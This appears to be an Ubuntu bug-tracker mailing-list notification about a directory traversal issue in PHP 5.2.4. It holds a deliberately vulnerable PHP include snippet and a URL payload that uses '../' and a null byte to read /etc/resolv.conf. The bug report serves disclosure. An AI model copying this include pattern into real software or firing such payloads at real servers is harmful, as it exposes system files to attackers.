I reproduced the same effect using webroot /var/www
file test.php:
<?php
if($_GET["pageID"])
$pageID=$_GET["pageID"];
include('page.'.$pageID.'.inc');
?>
http://myserver/test.php?pageID=/../../../etc/resolv.conf%00
filesystem is ext3 on a local harddrive
--
PHP 5.2.4-2ubuntu5.9 Possible exploit using directory traversal
https://bugs.launchpad.net/bugs/491835
You received this bug notification because you are a member of Ubuntu
Server Team, which is a direct subscriber.
--
Ubuntu-server-bugs mailing list
Ubuntu-server-bugs@lists.ubuntu.com
Modify settings or unsubscribe at:
https://lists.ubuntu.com/mailman/listinfo/ubuntu-server-bugs
